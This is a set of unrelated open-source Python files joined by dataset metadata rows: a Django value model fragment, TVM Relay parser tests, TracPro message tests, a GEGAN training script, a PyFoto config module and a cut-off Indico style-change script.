value = self.value
if value is None:
return ''
elif self.unit:
return '%s %s' % (value, self.unit)
else:
return value
@property
def is_true(self):
return self.text not in self.FALSE_TEXT
@property
def is_false(self):
return self.text in self.FALSE_TEXT
@property
def as_number(self):
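        # Best-effort numeric coercion of the stored text: a comma is accepted as the
        # decimal separator, and anything non-numeric falls back to 0.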
try:
val = self.text
except AttributeError:
return 0
else:
if isinstance(val, str):
val = val.replace(',', '.')
if isinstance(val, float) is False:
try:
return int(val)
except (ValueError, TypeError):
pass
try:
return float(val)
except (ValueError, TypeError):
return 0
else:
return val
@property
def file_name(self):
if self.file:
return Path(self.file.name).name
@property
def file_url(self):
if self.file:
return reverse('v1-projects:value-file', args=[self.id])
@property
def file_type(self):
if self.file:
return mimetypes.guess_type(self.file.name)[0]
@property
def file_path(self):
if self.file:
resource_path = get_value_path(self.project, self.snapshot)
return Path(self.file.name).relative_to(resource_path).as_posix()
def copy_file(self, file_name, file_content):
# copies a file field from a different value over to this value
# this is tricky, because we need to trick django_cleanup to not delete the original file
# important for snapshots and import from projects
self.file.save(file_name, file_content, save=False)
cleanup.refresh(self)
self.save()
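    # Rough usage sketch (the variable names here are illustrative, not part of this
    # module): when a snapshot or project import duplicates a Value carrying a file,
    # the new row can reuse the original's name and content, e.g.
    #   new_value.copy_file(old_value.file_name, old_value.file)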
| apache-2.0 | 2,072,839,092,465,988,000 | 30.148837 | 100 | 0.558907 | false |
sxjscience/tvm | tests/python/relay/test_ir_parser.py | 1 | 22635 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import tvm
from tvm import te
from tvm import relay
import tvm.relay.testing
import pytest
from numpy import isclose
from typing import Union
from functools import wraps
SEMVER = '#[version = "0.0.5"]\n'
BINARY_OPS = {
"*": relay.multiply,
"/": relay.divide,
"+": relay.add,
"-": relay.subtract,
"<": relay.less,
">": relay.greater,
"<=": relay.less_equal,
">=": relay.greater_equal,
"==": relay.equal,
"!=": relay.not_equal,
}
TYPES = {
"int8",
"int16",
"int32",
"int64",
"uint8",
"uint16",
"uint32",
"uint64",
"float16",
"float32",
"float64",
"bool",
"int8x4",
"uint1x4",
"float16x4",
}
LIST_DEFN = """
type List[A] {
Cons(A, List[A]),
Nil,
}
"""
def assert_graph_equal(lhs, rhs):
tvm.ir.assert_structural_equal(lhs, rhs, map_free_vars=True)
def graph_equal(lhs, rhs):
return tvm.ir.structural_equal(lhs, rhs, map_free_vars=True)
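# Round-trip helpers: pretty-print an expression or module, re-parse the text, and
# assert the result is structurally equal to the original node.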
def roundtrip_expr(expr):
text = tvm.relay.Expr.astext(expr, show_meta_data=False)
x = tvm.parser.parse_expr(text)
assert_graph_equal(x, expr)
# Testing Utilities for expressions.
def roundtrip(expr):
x = tvm.parser.fromtext(expr.astext())
assert_graph_equal(x, expr)
def parse_text(code):
expr = tvm.parser.parse_expr(code)
roundtrip_expr(expr)
return expr
def parses_as(code, expr):
# type: (str, relay.Expr) -> bool
parsed = parse_text(code)
result = graph_equal(parsed, expr)
return result
# Testing Utilities for full modules.
def parse_module(code):
mod = tvm.parser.parse(SEMVER + code)
roundtrip(mod)
return mod
def assert_parses_as(code, expr):
parsed = parse_text(code)
assert_graph_equal(parsed, expr)
def assert_parse_module_as(code, mod):
mod = tvm.relay.transform.InferType()(mod)
parsed = parse_module(code)
assert_graph_equal(parsed, mod)
def get_scalar(x):
# type: (relay.Constant) -> (Union[float, int, bool])
return x.data.asnumpy().item()
int32 = relay.scalar_type("int32")
_ = relay.Var("_")
X = relay.Var("x")
Y = relay.Var("y")
X_ANNO = relay.Var("x", int32)
Y_ANNO = relay.Var("y", int32)
UNIT = relay.Tuple([])
def test_comments():
assert_parses_as(
"""
// This is a line comment!
()
""",
UNIT,
)
assert_parses_as(
"""
/* This is a block comment!
This is still a block comment!
*/
()
""",
UNIT,
)
assert_parses_as(
"""
/* This is a block comment!
/*Block comment is recursive!*/
*/
()
""",
UNIT,
)
def test_int_literal():
assert isinstance(parse_text("1"), relay.Constant)
assert isinstance(parse_text("1").data, tvm.nd.NDArray)
assert get_scalar(parse_text("1")) == 1
assert get_scalar(parse_text("10")) == 10
assert get_scalar(parse_text("0")) == 0
assert get_scalar(parse_text("-100")) == -100
assert get_scalar(parse_text("-05")) == -5
def test_float_literal():
assert get_scalar(parse_text("1.0f")) == 1.0
assert isclose(get_scalar(parse_text("1.56667f")), 1.56667)
assert get_scalar(parse_text("0.0f")) == 0.0
assert get_scalar(parse_text("-10.0f")) == -10.0
# scientific notation
assert isclose(get_scalar(parse_text("1e-1f")), 1e-1)
assert get_scalar(parse_text("1e+1f")) == 1e1
assert isclose(get_scalar(parse_text("1E-1f")), 1e-1)
assert get_scalar(parse_text("1E+1f")) == 1e1
assert isclose(get_scalar(parse_text("1.0e-1f")), 1.0e-1)
assert get_scalar(parse_text("1.0e+1f")) == 1.0e1
assert isclose(get_scalar(parse_text("1.0E-1f")), 1.0e-1)
assert get_scalar(parse_text("1.0E+1f")) == 1.0e1
def test_bool_literal():
assert get_scalar(parse_text("True")) == True
assert get_scalar(parse_text("False")) == False
def test_negative():
# need to handle parsing non-literal operations
# assert isinstance(parse_text("let %x = 1; -%x").body, relay.Call)
assert get_scalar(parse_text("--10")) == 10
assert get_scalar(parse_text("---10")) == -10
def test_bin_op():
for bin_op in BINARY_OPS.keys():
assert_parses_as(
"1 {} 1".format(bin_op), BINARY_OPS.get(bin_op)(relay.const(1), relay.const(1))
)
def test_parens():
assert graph_equal(parse_text("1 * 1 + 1"), parse_text("(1 * 1) + 1"))
assert not graph_equal(parse_text("1 * 1 + 1"), parse_text("1 * (1 + 1)"))
def test_op_assoc():
assert graph_equal(parse_text("1 * 1 + 1 < 1 == 1"), parse_text("(((1 * 1) + 1) < 1) == 1"))
assert graph_equal(parse_text("1 == 1 < 1 + 1 * 1"), parse_text("1 == (1 < (1 + (1 * 1)))"))
def test_vars():
# var
var = parse_text("let %foo = (); %foo")
assert isinstance(var.body, relay.Var)
assert var.body.name_hint == "foo"
# global var
global_var = parse_text("@foo")
assert isinstance(global_var, relay.GlobalVar)
assert global_var.name_hint == "foo"
# operator id
op = parse_text("add")
assert isinstance(op, tvm.ir.Op)
assert op.name == "add"
# operator id with prefix
op = parse_text("nn.global_avg_pool2d")
assert isinstance(op, tvm.ir.Op)
assert op.name == "nn.global_avg_pool2d"
def test_meta_ref():
with pytest.raises(tvm.error.DiagnosticError):
meta_op = parse_text("meta[type_key][1337]")
assert meta_op.attrs.node_type_key == "type_key"
assert meta_op.attrs.node_index == 1337
def test_let():
assert_parses_as("let %x = 1; ()", relay.Let(X, relay.const(1), UNIT))
assert_parses_as(
"""
let %x = 1;
let %y = 2;
()
""",
relay.Let(X, relay.const(1), relay.Let(Y, relay.const(2), UNIT)),
)
def test_seq():
assert_parses_as("(); ()", relay.Let(_, UNIT, UNIT))
assert_parses_as("let %_ = 1; ()", relay.Let(X, relay.const(1), UNIT))
def test_graph():
code = "%0 = (); %1 = 1; (%0, %0, %1)"
assert_parses_as(code, relay.Tuple([UNIT, UNIT, relay.const(1)]))
def test_graph_single():
assert_parses_as("%1 = (); %1", relay.Tuple([]))
def test_let_global_var():
with pytest.raises(tvm.error.DiagnosticError):
parse_text("let @x = 1; ()")
def test_let_op():
with pytest.raises(tvm.error.DiagnosticError):
parse_text("let x = 1; ()")
def test_tuple():
assert_parses_as("()", relay.Tuple([]))
assert_parses_as("(0,)", relay.Tuple([relay.const(0)]))
assert_parses_as("(0, 1)", relay.Tuple([relay.const(0), relay.const(1)]))
assert_parses_as("(0, 1, 2)", relay.Tuple([relay.const(0), relay.const(1), relay.const(2)]))
def test_tuple_proj():
x = relay.var("x", shape=())
assert_parses_as(
"free_var %x: float32; %x((%x,).0, %x)",
relay.Call(x, [relay.TupleGetItem(relay.Tuple([x]), 0), x]),
)
def test_func():
# 0 args
assert_parses_as("fn () { 0 }", relay.Function([], relay.const(0), None, []))
# 1 arg
assert_parses_as("fn (%x) { %x }", relay.Function([X], X, None, []))
# 2 args
assert_parses_as("fn (%x, %y) { %x + %y }", relay.Function([X, Y], relay.add(X, Y), None, []))
# annotations
assert_parses_as("fn (%x: int32) -> int32 { %x }", relay.Function([X_ANNO], X_ANNO, int32, []))
# Refactor the attribute syntax and printing.
#
# # attributes
# assert_parses_as(
# "fn (n=5) { () }",
# relay.Function([], UNIT, None, None, tvm.ir.make_node("DictAttrs", n=relay.const(5)))
# )
# TODO(@jmp): Crashes if %x isn't annotated.
def test_defn():
id_defn = parse_module(
"""
def @id(%x: int32) -> int32 {
%x
}
"""
)
assert isinstance(id_defn, tvm.IRModule)
def test_recursive_call():
id_defn = parse_module(
"""
def @id(%x: int32) -> int32 {
@id(%x)
}
"""
)
assert isinstance(id_defn, tvm.IRModule)
def test_ifelse():
assert_parses_as(
"""
if (True) {
0
} else {
1
}
""",
relay.If(relay.const(True), relay.const(0), relay.const(1)),
)
def test_ifelse_scope():
with pytest.raises(tvm.error.DiagnosticError):
parse_text(
"""
if (True) {
let %x = ();
()
} else {
%x
}
"""
)
def test_ref():
program = """
#[version = "0.0.5"]
def @main(%x: float32) {
%0 = ref(%x);
ref_write(%0, 1f);
ref_read(%0)
}
"""
tvm.parser.parse(program)
def test_call():
# select right function to call: simple ident case
id_func = relay.Var("id")
assert_parses_as(
"""
let %id = fn (%x) { %x };
10 * %id(10)
""",
relay.Let(
id_func,
relay.Function([X], X, None, []),
relay.multiply(relay.const(10), relay.Call(id_func, [relay.const(10)])),
),
)
# 0 args
constant = relay.Var("constant")
assert_parses_as(
"""
let %constant = fn () { 0 };
%constant()
""",
relay.Let(
constant,
relay.Function([], relay.const(0), None, []),
relay.Call(constant, [], None, None),
),
)
# 1 arg
id_var = relay.Var("id")
assert_parses_as(
"""
let %id = fn (%x) { %x };
%id(1)
""",
relay.Let(
id_var,
relay.Function([X], X, None, []),
relay.Call(id_var, [relay.const(1)], None, None),
),
)
# 2 args
multiply = relay.Var("multiply")
assert_parses_as(
"""
let %multiply = fn (%x, %y) { %x * %y };
%multiply(0, 0)
""",
relay.Let(
multiply,
relay.Function([X, Y], relay.multiply(X, Y), None, []),
relay.Call(multiply, [relay.const(0), relay.const(0)], None, None),
),
)
# anonymous function
assert_parses_as(
"""
(fn (%x) { %x })(0)
""",
relay.Call(relay.Function([X], X, None, []), [relay.const(0)], None, None),
)
# curried function
curried_mult = relay.Var("curried_mult")
assert_parses_as(
"""
let %curried_mult =
fn (%x) {
fn (%y) {
%x * %y
}
};
%curried_mult(0);
%curried_mult(0)(0)
""",
relay.Let(
curried_mult,
relay.Function([X], relay.Function([Y], relay.multiply(X, Y), None, []), None, []),
relay.Let(
_,
relay.Call(curried_mult, [relay.const(0)], None, None),
relay.Call(
relay.Call(curried_mult, [relay.const(0)], None, None),
[relay.const(0)],
None,
None,
),
),
),
)
# op
assert_parses_as("abs(1)", relay.Call(relay.op.get("abs"), [relay.const(1)], None, None))
# Types
def test_incomplete_type():
assert_parses_as("let %_ : _ = (); ()", relay.Let(_, UNIT, UNIT))
def test_builtin_types():
for builtin_type in TYPES:
parse_text("let %_ : {} = (); ()".format(builtin_type))
def test_tensor_type():
assert_parses_as(
"let %_ : Tensor[(), float32] = (); ()",
relay.Let(relay.Var("_", relay.TensorType((), "float32")), UNIT, UNIT),
)
assert_parses_as(
"let %_ : Tensor[(1), float32] = (); ()",
relay.Let(relay.Var("_", relay.TensorType((1,), "float32")), UNIT, UNIT),
)
assert_parses_as(
"let %_ : Tensor[(1, 1), float32] = (); ()",
relay.Let(relay.Var("_", relay.TensorType((1, 1), "float32")), UNIT, UNIT),
)
assert_parses_as(
"let %_ : Tensor[(?, 1), float32] = (); ()",
relay.Let(relay.Var("_", relay.TensorType((tvm.tir.Any(), 1), "float32")), UNIT, UNIT),
)
def test_function_type():
assert_parses_as(
"""
let %_: fn () -> int32 = fn () -> int32 { 0 }; ()
""",
relay.Let(
relay.Var("_", relay.FuncType([], int32, [], [])),
relay.Function([], relay.const(0), int32, []),
UNIT,
),
)
assert_parses_as(
"""
let %_: fn (int32) -> int32 = fn (%x: int32) -> int32 { 0 }; ()
""",
relay.Let(
relay.Var("_", relay.FuncType([int32], int32, [], [])),
relay.Function([relay.Var("x", int32)], relay.const(0), int32, []),
UNIT,
),
)
assert_parses_as(
"""
let %_: fn (int32, int32) -> int32 = fn (%x: int32, %y: int32) -> int32 { 0 }; ()
""",
relay.Let(
relay.Var("_", relay.FuncType([int32, int32], int32, [], [])),
relay.Function(
[relay.Var("x", int32), relay.Var("y", int32)], relay.const(0), int32, []
),
UNIT,
),
)
def test_tuple_type():
assert_parses_as(
"""
let %_: () = (); ()
""",
relay.Let(relay.Var("_", relay.TupleType([])), UNIT, UNIT),
)
assert_parses_as(
"""
let %_: (int32,) = (0,); ()
""",
relay.Let(relay.Var("_", relay.TupleType([int32])), relay.Tuple([relay.const(0)]), UNIT),
)
assert_parses_as(
"""
let %_: (int32, int32) = (0, 1); ()
""",
relay.Let(
relay.Var("_", relay.TupleType([int32, int32])),
relay.Tuple([relay.const(0), relay.const(1)]),
UNIT,
),
)
def test_adt_defn():
mod = tvm.IRModule()
glob_typ_var = relay.GlobalTypeVar("Ayy")
prog = relay.TypeData(glob_typ_var, [], [relay.Constructor("Nil", [], glob_typ_var)])
mod[glob_typ_var] = prog
assert_parse_module_as(
"""
type Ayy { Nil }
""",
mod,
)
def test_adt_any():
code = """
type my_dtype {
my_cons(Tensor[(?, 1), uint16]),
}
"""
mod = parse_module(code)
items = mod.type_definitions.items()
global_type_var, type_data = items[0]
assert global_type_var.name_hint == "my_dtype"
ctors = type_data.constructors
assert len(ctors) == 1
my_cons = ctors[0]
assert my_cons.name_hint == "my_cons"
ty_shape = my_cons.inputs[0].shape
assert isinstance(ty_shape[0], tvm.tir.Any)
assert ty_shape[1] == 1
def test_empty_adt_defn():
mod = tvm.IRModule()
glob_typ_var = relay.GlobalTypeVar("Ayy")
prog = relay.TypeData(glob_typ_var, [], [])
mod[glob_typ_var] = prog
assert_parse_module_as(
"""
type Ayy { }
""",
mod,
)
def test_multiple_cons_defn():
mod = tvm.IRModule()
list_var = relay.GlobalTypeVar("List")
typ_var = relay.TypeVar("A")
prog = relay.TypeData(
list_var,
[typ_var],
[
relay.Constructor("Cons", [typ_var, list_var(typ_var)], list_var),
relay.Constructor("Nil", [], list_var),
],
)
mod[list_var] = prog
assert_parse_module_as(LIST_DEFN, mod)
def test_multiple_type_param_defn():
glob_typ_var = relay.GlobalTypeVar("Either")
typ_var_a = relay.TypeVar("A")
typ_var_b = relay.TypeVar("B")
prog = relay.TypeData(
glob_typ_var,
[typ_var_a, typ_var_b],
[
relay.Constructor("Left", [typ_var_a], glob_typ_var),
relay.Constructor("Right", [typ_var_b], glob_typ_var),
],
)
mod = tvm.IRModule()
mod[glob_typ_var] = prog
assert_parse_module_as(
"""
type Either[A, B] {
Left(A),
Right(B),
}
""",
mod,
)
def test_match():
# pair each match keyword with whether it specifies a complete match or not
match_keywords = [("match", True), ("match?", False)]
for (match_keyword, is_complete) in match_keywords:
mod = tvm.IRModule()
list_var = relay.GlobalTypeVar("List")
typ_var = relay.TypeVar("A")
cons_constructor = relay.Constructor("Cons", [typ_var, list_var(typ_var)], list_var)
nil_constructor = relay.Constructor("Nil", [], list_var)
list_def = relay.TypeData(list_var, [typ_var], [cons_constructor, nil_constructor])
mod[list_var] = list_def
length_var = relay.GlobalVar("length")
typ_var = relay.TypeVar("A")
input_type = list_var(typ_var)
input_var = relay.Var("xs", input_type)
rest_var = relay.Var("rest")
cons_case = relay.Let(
relay.var("", type_annotation=None),
UNIT,
relay.add(relay.const(1), relay.Call(length_var, [rest_var])),
)
body = relay.Match(
input_var,
[
relay.Clause(
relay.PatternConstructor(
cons_constructor, [relay.PatternWildcard(), relay.PatternVar(rest_var)]
),
cons_case,
),
relay.Clause(relay.PatternConstructor(nil_constructor, []), relay.const(0)),
],
complete=is_complete,
)
length_func = relay.Function([input_var], body, int32, [typ_var])
mod[length_var] = length_func
assert_parse_module_as(
"""
%s
def @length[A](%%xs: List[A]) -> int32 {
%s (%%xs) {
Cons(_, %%rest : List[A]) => {
();
1 + @length(%%rest)
},
Nil => 0,
}
}
"""
% (LIST_DEFN, match_keyword),
mod,
)
def test_adt_cons_expr():
mod = tvm.IRModule()
list_var = relay.GlobalTypeVar("List")
typ_var = relay.TypeVar("A")
cons_constructor = relay.Constructor("Cons", [typ_var, list_var(typ_var)], list_var)
nil_constructor = relay.Constructor("Nil", [], list_var)
list_def = relay.TypeData(list_var, [typ_var], [cons_constructor, nil_constructor])
mod[list_var] = list_def
make_singleton_var = relay.GlobalVar("make_singleton")
input_var = relay.Var("x", int32)
make_singleton_func = relay.Function(
[input_var], cons_constructor(input_var, nil_constructor()), list_var(int32)
)
mod[make_singleton_var] = make_singleton_func
assert_parse_module_as(
"""
%s
def @make_singleton(%%x: int32) -> List[int32] {
Cons(%%x, Nil)
}
"""
% LIST_DEFN,
mod,
)
def test_duplicate_adt_defn():
with pytest.raises(tvm.error.DiagnosticError):
parse_module(
"""
%s
type List[A] {
Cons(A, List[A]),
Nil,
}
"""
% LIST_DEFN
)
def test_duplicate_adt_cons():
with pytest.raises(tvm.error.DiagnosticError):
parse_text(
"""
type Ayy { Lmao }
type Haha { Lmao }
"""
)
def test_duplicate_adt_cons_defn():
with pytest.raises(tvm.error.DiagnosticError):
parse_text(
"""
type Ayy { Lmao }
type Lmao { Ayy }
"""
)
def test_duplicate_global_var():
with pytest.raises(tvm.error.DiagnosticError):
parse_text(
"""
def @id[A](%x: A) -> A { x }
def @id[A](%x: A) -> A { x }
"""
)
def test_extern_adt_defn():
mod = tvm.IRModule()
extern_var = relay.GlobalTypeVar("T")
typ_var = relay.TypeVar("A")
extern_def = relay.TypeData(extern_var, [typ_var], [])
mod[extern_var] = extern_def
assert_parse_module_as(
"""
extern type T[A]
""",
mod,
)
def test_import_grad():
mod = tvm.IRModule()
mod.import_from_std("gradient.rly")
def test_resnet():
mod, _ = relay.testing.resnet.get_workload()
text = mod.astext()
parsed_mod = tvm.parser.parse(text)
tvm.ir.assert_structural_equal(mod, parsed_mod)
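# Bind the trained parameter tensors into @main as constants so the module can be
# printed and re-parsed without needing the external params dict.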
def inline_params(mod, params):
main_fn = mod["main"]
str_to_var = {}
for param in main_fn.params:
str_to_var[param.name_hint] = param
bind_map = {}
for param in params:
bind_map[str_to_var[param]] = relay.const(params[param])
body = relay.bind(main_fn.body, bind_map)
main_fn = relay.Function(relay.analysis.free_vars(body), body)
mod._add("main", main_fn, True)
return mod
def test_resnet_inlined_params():
mod, params = relay.testing.resnet.get_workload()
mod = inline_params(mod, params)
mod = relay.transform.InferType()(mod)
text = mod.astext()
parsed_mod = tvm.parser.parse(text)
tvm.ir.assert_structural_equal(mod, parsed_mod)
def test_tuple_return_value():
program = """
type Box[T] {
constructor(T)
}
def @example() {
%0 = ();
%1 = constructor(%0);
%2 = constructor(0f);
(%1, %2,)
}
"""
parse_module(program)
def test_op_string_attr():
call = parse_text(
"""
free_var %x: Tensor[(1, 32, 32, 3), float32];
free_var %y: Tensor[(1, 1, 3, 3), float32];
nn.conv2d(%x, %y, data_layout="NHWC", kernel_layout="HWIO")
"""
)
assert isinstance(call.op, tvm.ir.Op)
assert call.op.name == "nn.conv2d"
assert call.attrs.data_layout == "NHWC"
assert call.attrs.kernel_layout == "HWIO"
def test_load_prelude():
mod = tvm.IRModule()
mod.import_from_std("prelude.rly")
tvm.parser.parse(mod.astext())
if __name__ == "__main__":
import sys
pytest.main(sys.argv)
| apache-2.0 | -6,946,301,590,166,049,000 | 24.094235 | 99 | 0.522377 | false |
ewheeler/tracpro | tracpro/msgs/tests.py | 1 | 4100 | from __future__ import absolute_import, unicode_literals
from django.core.urlresolvers import reverse
from django.test.utils import override_settings
from django.utils import timezone
from mock import patch
from temba.types import Broadcast
from tracpro.msgs.models import Message, COHORT_ALL, COHORT_RESPONDENTS, COHORT_NONRESPONDENTS
from tracpro.polls.models import Issue, Response, RESPONSE_COMPLETE, RESPONSE_PARTIAL, RESPONSE_EMPTY
from tracpro.test import TracProTest
class MessageTest(TracProTest):
@override_settings(CELERY_ALWAYS_EAGER=True, CELERY_EAGER_PROPAGATES_EXCEPTIONS=True, BROKER_BACKEND='memory')
@patch('dash.orgs.models.TembaClient.create_broadcast')
def test_create(self, mock_create_broadcast):
mock_create_broadcast.return_value = Broadcast.create()
now = timezone.now()
# create non-regional issue with 3 responses (1 complete, 1 partial, 1 empty)
issue1 = Issue.objects.create(poll=self.poll1, region=None, conducted_on=timezone.now())
Response.objects.create(flow_run_id=123, issue=issue1, contact=self.contact1,
created_on=now, updated_on=now, status=RESPONSE_COMPLETE)
Response.objects.create(flow_run_id=234, issue=issue1, contact=self.contact2,
created_on=now, updated_on=now, status=RESPONSE_PARTIAL)
Response.objects.create(flow_run_id=345, issue=issue1, contact=self.contact4,
created_on=now, updated_on=now, status=RESPONSE_EMPTY)
msg1 = Message.create(self.unicef, self.admin, "Test #1", issue1, COHORT_ALL, None)
self.assertEqual(msg1.org, self.unicef)
self.assertEqual(msg1.sent_by, self.admin)
self.assertIsNotNone(msg1.sent_on)
self.assertEqual(msg1.text, "Test #1")
self.assertEqual(msg1.issue, issue1)
self.assertEqual(msg1.cohort, COHORT_ALL)
self.assertEqual(msg1.region, None)
self.assertEqual(list(msg1.recipients.order_by('pk')), [self.contact1, self.contact2, self.contact4])
self.assertEqual(unicode(msg1), "Test #1")
self.assertEqual(msg1.as_json(), dict(id=msg1.pk, recipients=3))
msg2 = Message.create(self.unicef, self.admin, "Test #1", issue1, COHORT_RESPONDENTS, None)
self.assertEqual(msg2.cohort, COHORT_RESPONDENTS)
self.assertEqual(msg2.region, None)
self.assertEqual(list(msg2.recipients.order_by('pk')), [self.contact1])
msg3 = Message.create(self.unicef, self.admin, "Test #1", issue1, COHORT_NONRESPONDENTS, None)
self.assertEqual(msg3.cohort, COHORT_NONRESPONDENTS)
self.assertEqual(msg3.region, None)
self.assertEqual(list(msg3.recipients.order_by('pk')), [self.contact2, self.contact4])
msg4 = Message.create(self.unicef, self.admin, "Test #1", issue1, COHORT_ALL, self.region1)
self.assertEqual(msg4.cohort, COHORT_ALL)
self.assertEqual(msg4.region, self.region1)
self.assertEqual(list(msg4.recipients.order_by('pk')), [self.contact1, self.contact2])
class MessageCRUDLTest(TracProTest):
def test_list(self):
url = reverse('msgs.message_list')
# create a non-regional issue
issue1 = Issue.objects.create(poll=self.poll1, region=None, conducted_on=timezone.now())
# send 1 message to all regions and 2 more to specific regions
msg1 = Message.create(self.unicef, self.admin, "Test to all", issue1, COHORT_ALL, None)
msg2 = Message.create(self.unicef, self.admin, "Test to region #1", issue1, COHORT_ALL, self.region1)
msg3 = Message.create(self.unicef, self.admin, "Test to region #2", issue1, COHORT_ALL, self.region2)
self.login(self.admin)
response = self.url_get('unicef', url)
self.assertEqual(list(response.context['object_list']), [msg3, msg2, msg1])
self.switch_region(self.region1)
# should still include message sent to all regions
response = self.url_get('unicef', url)
self.assertEqual(list(response.context['object_list']), [msg2, msg1])
| bsd-3-clause | -3,310,450,870,934,221,300 | 50.25 | 114 | 0.688537 | false |
xhchrn/gegan | train.py | 1 | 3732 | # -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import absolute_import
import tensorflow as tf
import argparse
from model.gegan import GEGAN
parser = argparse.ArgumentParser(description='Train')
parser.add_argument('--experiment_dir', dest='experiment_dir', required=True,
help='experiment directory, data, samples,checkpoints,etc')
parser.add_argument('--experiment_id', dest='experiment_id', type=int, default=0,
help='sequence id for the experiments you prepare to run')
parser.add_argument('--image_size', dest='image_size', type=int, default=64,
help="size of your input and output image")
parser.add_argument('--L1_penalty', dest='L1_penalty', type=int, default=100, help='weight for L1 loss')
parser.add_argument('--Lconst_penalty', dest='Lconst_penalty', type=int, default=15, help='weight for const loss')
parser.add_argument('--Ltv_penalty', dest='Ltv_penalty', type=float, default=0.0, help='weight for tv loss')
parser.add_argument('--Lcategory_penalty', dest='Lcategory_penalty', type=float, default=1.0,
help='weight for category loss')
parser.add_argument('--embedding_num', dest='embedding_num', type=int, default=2,
help="number for distinct embeddings")
parser.add_argument('--embedding_dim', dest='embedding_dim', type=int, default=64, help="dimension for embedding")
parser.add_argument('--epoch', dest='epoch', type=int, default=100, help='number of epoch')
parser.add_argument('--batch_size', dest='batch_size', type=int, default=16, help='number of examples in batch')
parser.add_argument('--lr', dest='lr', type=float, default=0.001, help='initial learning rate for adam')
parser.add_argument('--schedule', dest='schedule', type=int, default=10, help='number of epochs to half learning rate')
parser.add_argument('--resume', dest='resume', type=int, default=1, help='resume from previous training')
parser.add_argument('--freeze_encoder', dest='freeze_encoder', type=int, default=0,
help="freeze encoder weights during training")
parser.add_argument('--fine_tune', dest='fine_tune', type=str, default=None,
help='specific labels id to be fine tuned')
parser.add_argument('--inst_norm', dest='inst_norm', type=int, default=0,
help='use conditional instance normalization in your model')
parser.add_argument('--sample_steps', dest='sample_steps', type=int, default=10,
help='number of batches in between two samples are drawn from validation set')
parser.add_argument('--checkpoint_steps', dest='checkpoint_steps', type=int, default=500,
help='number of batches in between two checkpoints')
args = parser.parse_args()
def main(_):
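    # allow_growth keeps TensorFlow from reserving all GPU memory up front; the GEGAN
    # graph is built in training mode and trained with the CLI hyper-parameters.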
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
with tf.Session(config=config) as sess:
model = GEGAN(args.experiment_dir, batch_size=args.batch_size, experiment_id=args.experiment_id,
input_width=args.image_size, output_width=args.image_size, embedding_num=args.embedding_num,
embedding_dim=args.embedding_dim, L1_penalty=args.L1_penalty, Lconst_penalty=args.Lconst_penalty,
Ltv_penalty=args.Ltv_penalty, Lcategory_penalty=args.Lcategory_penalty)
model.register_session(sess)
model.build_model(is_training=True, inst_norm=args.inst_norm)
model.train(lr=args.lr, epoch=args.epoch, resume=args.resume,
schedule=args.schedule, freeze_encoder=args.freeze_encoder,
sample_steps=args.sample_steps, checkpoint_steps=args.checkpoint_steps)
if __name__ == '__main__':
tf.app.run()
| apache-2.0 | -6,427,230,271,344,068,000 | 61.2 | 119 | 0.681404 | false |
cdgriffith/PyFoto | pyfoto/config.py | 1 | 2058 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
import os
import logging
import yaml
import reusables
default_config = dict(
storage_directory="storage",
# TODO add {date}, {time}, {type}, {hash}, {size}
dir_names="{increment}",
file_names="{increment}.{ext}",
remove_source=False,
folder_limit=1000,
ignore_duplicates=False,
dir_inc=0,
file_inc=0,
connect_string="sqlite:///pyfoto.sqlite"
)
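# Values found in config.yaml override these defaults; dir_inc and file_inc track the
# running counters behind the {increment} placeholders in dir_names/file_names.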
def get_config(config_file: str="config.yaml") -> reusables.Namespace:
"""
:param config_file:
:return:
"""
config = default_config.copy()
if os.path.exists(config_file):
with open(config_file) as f:
config.update(yaml.load(f))
else:
logger.warning('Config file "{0}" does not exist, using '
'defaults which will be saved to it'.format(config_file))
logger.debug("Loaded Config - {0}".format(config))
return reusables.Namespace(**config)
def save_config(config: dict, config_file: str="config.yaml") -> None:
"""
:param config:
:param config_file:
:return:
"""
out_config = config.copy()
dir_path = os.path.dirname(config_file)
if dir_path and not os.path.exists(dir_path):
logger.warning("Attempting to create new path to config file: "
"{0}".format(dir_path))
os.makedirs(dir_path, exist_ok=True)
with open(config_file, "w") as f:
yaml.dump(out_config, f, default_flow_style=False)
logger.debug("Saved config - {0}".format(out_config))
def get_stream_logger(module, level: int=0):
new_logger = logging.getLogger("PyFoto.{}".format(module))
sh = logging.StreamHandler()
if level > 0:
sh.setLevel(level)
formatter = logging.Formatter('%(asctime)s - %(name)s - '
'%(levelname)s - %(message)s')
sh.setFormatter(formatter)
new_logger.addHandler(sh)
if level > 0:
new_logger.setLevel(level)
return new_logger
logger = get_stream_logger("config", level=0)
| mit | -5,122,755,118,486,069,000 | 24.407407 | 80 | 0.606414 | false |
Ictp/indico | bin/utils/changeStyle.py | 1 | 1781 | # -*- coding: utf-8 -*-
##
##
## This file is part of Indico.
## Copyright (C) 2002 - 2014 European Organization for Nuclear Research (CERN).
##
## Indico is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 3 of the
## License, or (at your option) any later version.
##
## Indico is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Indico;if not, see <http://www.gnu.org/licenses/>.
from indico.core.db import DBMgr
from MaKaC.webinterface import displayMgr
from MaKaC.conference import CategoryManager
logfile = open('./oldstyles', 'w')
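# Walk category 233 recursively, switching every sub-category and conference to the
# 'lhcb_meeting' display style and logging each one's previous style to ./oldstyles.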
def changeCatStyle(cat):
for subcat in cat.getSubCategoryList():
currentStyle=subcat.getDefaultStyle("meeting")
subcat.setDefaultStyle("meeting", "lhcb_meeting")
logfile.write("cat %s: %s"%(subcat.getId(), currentStyle))
changeCatStyle(subcat)
for conf in cat.getConferenceList():
currentStyle=displayMgr.ConfDisplayMgrRegistery().getDisplayMgr(conf).getDefaultStyle()
